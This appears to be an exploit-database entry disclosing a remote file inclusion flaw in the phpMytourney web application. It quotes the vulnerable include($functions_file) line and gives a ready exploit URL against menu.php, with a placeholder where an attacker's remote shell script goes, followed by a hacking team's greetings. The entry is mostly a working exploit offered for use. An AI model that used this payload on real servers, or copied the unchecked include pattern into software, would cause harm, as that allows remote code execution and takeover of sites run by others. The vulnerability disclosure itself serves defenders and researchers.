id: 2111
date: 09/05/2007
title: phpMytourney (menu.php) Remote File Inclusion Vulnerability
author: S.W.A.T.
cves: 

===========================================================
phpMytourney (menu.php) Remote File Inclusion Vulnerability
===========================================================



*******************************************************************************
# Title   :  phpMytourney (functions_file) Remote File Inclusion Vulnerability
# Author  :  S.W.A.T.
# $$      :  Free
*******************************************************************************
Vuln Code:

include($functions_file);

[[Remote]]]

http://[target]/[path]/menu.php?functions_file=[SHELL]

"""""""""""""""""""""

# I Love XmorsTEAM
# We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T.
# Iranian Hackers & Security TEAM
# Xmors Digital Network Hacking & Security Team



#  0day.today [2023-03-25]  #